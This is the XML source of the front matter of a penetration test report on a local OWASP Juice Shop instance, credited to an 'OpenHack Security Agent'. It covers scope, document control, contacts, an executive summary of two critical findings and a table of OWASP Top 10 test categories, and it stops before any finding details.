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Web Application Penetration Test Report — v1.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Target System: OWASP Juice Shop v19.1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Performed by the OpenHack Security Agent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Issued by Jane Doe (jane.doe@openhack.sec)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Date"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2026-02-20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenHack Security Agent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">was engaged by</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Bjoern Kimminich</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to conduct an external IT security investigation. The subject of the investigation was the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“OWASP Juice Shop v19.1.1”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The test was performed using a local instance of the application at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">localhost:3333</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in a dedicated test environment..</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Objective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The objective of the IT security investigation was to identify vulnerabilities and security gaps which, in the event of misuse, would have an impact on the availability, integrity and confidentiality of the defined applications and/or systems and the data processed on them. The result of this project is a report that contains a management summary of all relevant findings and a compilation of recommended measures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The technical IT security audit is not a substantive audit effort to ensure that all vulnerabilities and security gaps existing at the time of the audit are identified. There is a possibility that established safeguards will effectively prevent identification and exploitation of vulnerabilities and security gaps. The client acknowledges that this is not an indicator of deficiencies in engagement performance and that additional unidentified vulnerabilities and security gaps may exist.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="9" w:name="document-control"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Document Status</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2718"/>
        <w:gridCol w:w="5201"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security Assessment Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Document Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">OpenHack Security Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Strictly Confidential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Project Timeframe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2026-02-20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Version History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State</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Comments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2026-02-20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Draft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Jane Doe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">–</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2026-02-20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Final document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Jane Doe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">–</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Contact Persons - Assessor</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Jane Doe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lead Security Consultant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">+1 555 123 4567</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">jane.doe@openhack.sec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">John Smith</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security Consultant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">+1 555 234 5678</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">john.smith@openhack.sec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Contact Persons - Client</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1542"/>
        <w:gridCol w:w="2571"/>
        <w:gridCol w:w="1542"/>
        <w:gridCol w:w="2262"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Phone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bjoern Kimminich</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Project Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">+1 555 345 6789</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">bjoern.kimminich@owasp.org</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:id="10" w:name="executive-summary"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenHack Security Agent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(hereinafter referred to as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“ASSESSOR”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) has been commissioned by</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Bjoern Kimminich</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(hereinafter referred to as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“CLIENT”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) to carry out a penetration test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The penetration test of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Juice Shop v19.1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">application took place on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2026-02-20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For this purpose, the web application, accessible at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://localhost:3333</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, was tested from the perspective of an external attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As part of the test, a total of 2 vulnerabilities were identified: 2 critical, 0 high, 0 medium, 0 low, and 0 informational.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Critical:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">| High:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">| Medium:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">| Low:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">| Informational:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">| Total:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableCaption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Overview of Findings</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="3889"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
        <w:tblCaption w:val="Overview of Findings"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5170"/>
        <w:gridCol w:w="880"/>
        <w:gridCol w:w="110"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">|</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</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p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A description of the scope and test environment can be found in Chapter 3. Chapter 4 presents the risk assessment methodology. Chapter 5 provides a summary of findings. Chapter 6 contains the detailed technical descriptions of the findings including remediation measures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It is recommended that the remediation of the critical risk vulnerabilities be treated with the highest priority and countermeasures implemented as soon as possible. The vulnerabilities with high and medium risk should also be remedied in the short term. The low-risk vulnerabilities should be treated with lower priority due to their reduced risk, but should still be addressed.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:bookmarkStart w:id="15" w:name="X55a090500ae0830f4c87de9d9be2e793ad55880"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Execution of the Security Penetration Test</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="11" w:name="subject-under-test"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Subject Under Test</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkStart w:id="12" w:name="scope"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The scope for the assessment was the following targets:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkStart w:id="13" w:name="methodology"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The security penetration test of the OWASP Juice Shop v19.1.1 took place on 2026-02-20.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The web application was tested for security vulnerabilities across the following categories. This can be considered a guideline as penetration tests are a creative process and therefore the tests are not limited to what is given here. The base of these categories is the OWASP Top 10 for Web, which is fully covered by this penetration test approach.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2130"/>
        <w:gridCol w:w="5789"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Users can act outside their permissions, leading to unauthorized viewing, modification, or deletion of data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Systems or cloud services are insecurely configured, e.g., through default passwords or unnecessarily enabled features.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Software Supply Chain Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vulnerabilities arise from compromised third-party code, libraries, or build pipelines.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cryptographic Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sensitive data is exposed through missing, weak, or incorrectly implemented encryption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
